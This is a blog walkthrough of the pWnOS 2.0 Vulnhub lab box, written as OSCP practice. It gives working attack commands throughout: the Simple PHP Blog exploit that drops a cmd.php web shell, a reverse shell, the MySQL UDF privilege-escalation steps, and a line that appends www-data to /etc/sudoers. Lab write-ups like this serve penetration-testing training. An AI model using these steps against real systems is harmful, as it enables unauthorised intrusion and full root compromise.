Vulnhub virtual machine; OSCP prep box, classic boot the root box which enumeration leads to a blog page that is suseptiable to pretty serious vulnerability that leads to the foothold of the box. Priv-esc was trickery as in the end the simplest solutions are the hardest to figure out - added secondary priv-esc.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.

Vulnhub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ File: pWnOS_v2.0.7z (Size: 286 MB) - Filetype: .vmdk (virtual hard drive)

Setup Note: make sure you put VM 10.10.10.0/24 network.

Discover VM on network && ping for connectivity:

1	`netdiscover -r 10.10.10.0/24`

Target: 10.10.10.100 - and we have successful connectivity

Enumeration

Nmap Scan:

1	`nmap -sV -sC -oA nmap/pwnos 10.10.10.100`

We are looking at an SSH server and an HTTP server.

Options: -We can try to kick in the front door of the SSH - unlikely -Navigate to web-server and investigate a way in.

Navigate to web-server:

source:

potential login and register page and discovered a possible user [email protected]

attempt SQLi with email and ' or 3=3 --

No-go for injection.

Looks like we have to activate the user account.

navigating to: http://10.10.10.100/activate.php?x=exec%40email.com&y=ab822cb907de2268500066b49acb17b4

activated now lets attempt to login and look for a way into the box.

seems to hang at this point…

Source:

confirmed we did not hang and we are just on an very non-interesting page.

Dirbuster - we need to find some new directories.

well we found a /blog

Navigate to /blog

source:

web-application identified as Simple PHP Blog 0.4.0

Searching for vulnerabilites

1	`searchsploit simple php blog`

both exploits jump off the page. Download locally with -m flag

checking out the 1191.pl

syntax we should attempt which should return the password file (hash):

1	`perl 1191.pl -h http://10.10.10.100/blog -e 2`

result:

it successfully gave us the password hash. Lets see what else this exploit can do.

RCE

upload cmd.php

1	`perl 1191.pl -h http://10.10.10.100/blog -e 1`

we have a successful cmd.php installed on web-server.

Quick test:

1	`http://10.10.10.100/blog/images/cmd.php?cmd=whoami`

we get a response of www-data - Execllent.

Reverse the shell:

Setup listener with Metasploit.

tell web-server to get my reverse shell .php file.

successful download. Now lets connect to the server.

Connection established.

Upgrade shell

1	`python -c 'import pty; pty.spawn("/bin/bash")'`

upgraded!

now let’s move to priv-escalate.

Priv-Esc

First we need to enumerate a bit of the box with some scripts.

1	`uname -a`

wget files to box

uploaded successfully to /dev/shm

Change chmod to 700

load scripts.

Scripts discovered a few priv-esc exploits

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

Investigate the WWW folder Discovered a mysqli_connect.php which contains database creditials

Navigate /var an noticed another mysqli_connect.php

Connecto to mysql server:

1	`mysql -u root -p`

check for passwords:

found hashes to decrypt

Secondary Priv-Esc/Root

I wanted to attempt to try the “udav” and MySQL privilage escalations and while going doing the udav road I was unsuccessful escalating. When it came to the MySQL escalate I ran into a some slight issues compiling but was able to create the file locally and then send to box. Below you will see my solution via MySQL.

Exploit: - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

I downloaded locally and began inspecting the source:

 Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys

while attempting to compile the raptor_udfs.so it would not compile on the box as so I compiled it locally and sent to box.

error recieved:

after compiled locally and sent:

show tables
create table foo(line blob);
insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';

recieved an error that the raptor_udf2.so did not exist in the /usr/lib/raptor_udf2.so so at this point I manually pushed the file to the directory.

under mysql table:

1	`select do_system('echo "www-data ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');`

we have succefully aded www-data to the /etc/sudoer file which we can just sudo bash to achieve a root shell.

Root

The likelyhood of passwords being reused is always an options - attempt ssh to root

1	`ssh [email protected]`

with the two variant of passwords is always worth a shot

Bring me the root!

-exec